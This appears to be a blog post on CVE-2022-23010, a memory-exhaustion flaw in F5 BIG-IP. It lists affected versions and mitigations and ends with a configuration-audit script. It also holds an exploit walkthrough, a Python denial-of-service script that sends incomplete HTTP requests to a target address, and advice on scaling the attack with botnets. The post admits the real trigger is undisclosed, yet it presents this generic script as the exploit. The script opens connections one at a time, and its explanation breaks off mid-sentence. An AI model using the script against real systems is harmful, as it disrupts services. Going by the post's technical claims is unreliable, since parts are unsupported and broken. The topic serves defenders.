Resource exhaustion bugs can be dangerous, often causing performance drops or even full denial of service. CVE-2022-23010 is a high-profile vulnerability impacting several versions of F5 BIG-IP, one of the most widely used application delivery controllers in enterprise environments. If left unpatched, attackers can increase memory usage through crafted requests, potentially bringing down critical services.

In this long read, we’ll break down the nature of this bug, walk through how to reproduce it, provide code snippets demonstrating an attack scenario, and—most importantly—talk about how to fix it. All in clear, everyday English, with exclusive insights.

Affected Versions

- 14.1.x before 14.1.4.4
- All of 13.1.x, 12.1.x, and 11.6.x (including EoTS versions, but support is not provided for those)

Vulnerable Configuration

- A FastL4 profile and an HTTP profile are both attached to the same virtual server

Undisclosed (but malformed or excessive) HTTP requests can trigger excessive memory consumption. Over time, this can affect system stability, leading to slowdowns or outages.

Official Advisory

> F5 Security Advisory K02613237  
> CVE Details Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23010  
> NVD Listing: NIST NVD CVE-2022-23010

Why Does This Happen?

The bug is triggered by the unusual combination of a FastL4 profile and an HTTP profile on a single virtual server.

- FastL4 is designed to accelerate traffic at the transport layer (TCP/UDP).
- HTTP profile enables Layer 7 processing, such as inspecting HTTP headers, handling persistence, etc.

When both profiles are present, an attacker can send HTTP requests in unexpected ways, causing BIG-IP to mishandle memory allocation for those requests.

BIG-IP will then, under attack, fail to clean up the allocated memory, resulting in memory resource exhaustion. This can impact all traffic, not just the attacker's.

Exploit Walkthrough

Here’s an example of how a pen tester or attacker might exploit this vulnerability.

1. Identify a target BIG-IP system matching a vulnerable version.
   - Confirm (via error messages or HTTP headers like Server: BigIP and scanning tools) that a virtual server is using both FastL4 and HTTP profiles.
2. Use a tool to send a large number of malformed or incomplete HTTP requests to the virtual server.
   - Because the requests are not handled or cleaned up properly, each one increases memory use on the target.
   - The attacker repeats this in a loop, causing the BIG-IP device to gradually run out of resources, resulting in degraded performance or denial of service (DoS).

Proof-of-Concept (PoC) Attack Script

Here’s a Python script that simulates the attack by sending incomplete HTTP requests. You can use netcat or telnet for similar tests, but Python allows you to automate the load.

> Disclaimer: Only test this on systems you own or are authorized to assess.

```python
import socket
import time

TARGET_IP = '192.168.100.100'  # Replace with target BIG-IP IP
TARGET_PORT = 80               # Default HTTP port, adjust if needed
# The headers end without the blank line (second "\r\n") that terminates an HTTP request
REQUEST = b"GET / HTTP/1.1\r\nHost: vulnerable.server\r\n"  # incomplete request!

def hammer(target_ip, target_port):
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((target_ip, target_port))
            s.sendall(REQUEST)
            # Do not send the extra \r\n to finish the HTTP request
            # This leaves the connection hanging, consuming resources
            time.sleep(60)  # Keep the connection open for 60 seconds
        # The `with` block closes the socket here, even if an error occurred
    except Exception as e:
        print("Error:", e)

# Open connections one after another, holding each one open for 60 seconds
for _ in range(100):
    hammer(TARGET_IP, TARGET_PORT)
```

What this does

- Sends many incomplete HTTP requests (each missing the final newline that terminates the HTTP request),

Amplifying the Attack

For maximum impact, attackers often use distributed botnets to launch thousands of simultaneous connections. Tools like Slowloris can be adapted to automate these attacks at scale.

Check system health:

- Monitor logs (/var/log/ltm) and resources (tmsh show sys memory).

Mitigation and Remediation

F5 recommends upgrading to a fixed version:

- 14.1.x: Upgrade to 14.1.4.4 or later
- 13.1.x / 12.1.x / 11.6.x: No fix (EoTS — End of Technical Support). Strongly recommend upgrading to a supported version.

Additional mitigations:

- Limit connections using connection limits in your virtual server configuration.
- Deploy external rate-limiting (firewall, WAF, or intrusion detection system) to filter abusive requests.
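As an added defensive example (not code from the original post or from F5), the following script audits a dump of `tmsh list ltm profile fastl4`, `tmsh list ltm profile http` and `tmsh list ltm virtual` output for virtual servers that have both profile types attached, the combination described above; the sample configuration is constructed, and the regexes assume tmsh's default 4-space indentation.

```python
import re

# Constructed sample of tmsh `list` output for the relevant objects
# (not captured from a real BIG-IP).
SAMPLE_CONFIG = """\
ltm profile fastl4 fastL4 {
}
ltm profile fastl4 fastL4-custom {
    defaults-from fastL4
}
ltm profile http http {
}
ltm virtual vs_risky {
    profiles {
        fastL4-custom { }
        http { }
    }
}
ltm virtual vs_ok {
    profiles {
        http { }
        tcp { }
    }
}
"""

# Top-level tmsh objects we care about; their closing brace sits in column 0.
BLOCK_RE = re.compile(r"^ltm (profile fastl4|profile http|virtual) (\S+) \{\n(.*?)^\}", re.M | re.S)
# The `profiles { ... }` sub-block of a virtual server and the profile names inside it.
PROFILES_RE = re.compile(r"^    profiles \{\n(.*?)^    \}", re.M | re.S)
NAME_RE = re.compile(r"^ {8}(\S+) \{", re.M)

def find_risky_virtuals(config: str) -> dict:
    """Return {virtual server: [attached profiles]} for every virtual server with both
    a fastL4 and an HTTP profile attached; custom names resolve via their definitions."""
    fastl4, http, virtuals = set(), set(), {}
    for kind, name, body in BLOCK_RE.findall(config):
        if kind == "profile fastl4":
            fastl4.add(name)
        elif kind == "profile http":
            http.add(name)
        else:  # ltm virtual
            m = PROFILES_RE.search(body)
            virtuals[name] = NAME_RE.findall(m.group(1)) if m else []
    return {vs: p for vs, p in virtuals.items() if set(p) & fastl4 and set(p) & http}

if __name__ == "__main__":
    for vs, profs in find_risky_virtuals(SAMPLE_CONFIG).items():
        print(f"{vs}: fastL4 and HTTP profiles both attached ({', '.join(profs)})")
```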

References

- F5 Security Advisory K02613237
- NVD CVE-2022-23010 Details

Conclusion

*CVE-2022-23010* is a classic example of how combining configuration options can create unexpected (and dangerous) results. By using features in a particular way (combining FastL4 and HTTP profiles on one virtual server), attackers can destabilize F5 BIG-IP systems. This can disrupt not just websites, but potentially core services for an entire business.

Takeaway:  
If you manage BIG-IP devices, audit your configurations immediately. Remove unnecessary profiles, upgrade to fixed versions, and monitor for abnormal memory use. Don't wait for a real outage to discover you’re vulnerable.


Exclusive Tip:  
Many organizations are running BIG-IP in ways that haven't been reviewed in years. Use this as an opportunity to review all your virtual server profiles. Removing unused or risky configurations not only protects you from CVE-2022-23010, but from future bugs too.


> For more details, visit the official F5 knowledge base and the CVE record. For hands-on defenders, tools like Slowloris are handy for testing if your changes are effective.

*Stay updated, stay protected!*

If you have questions or want a deeper dive, let me know in the comments or reach out directly.

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 17:21:00 UTC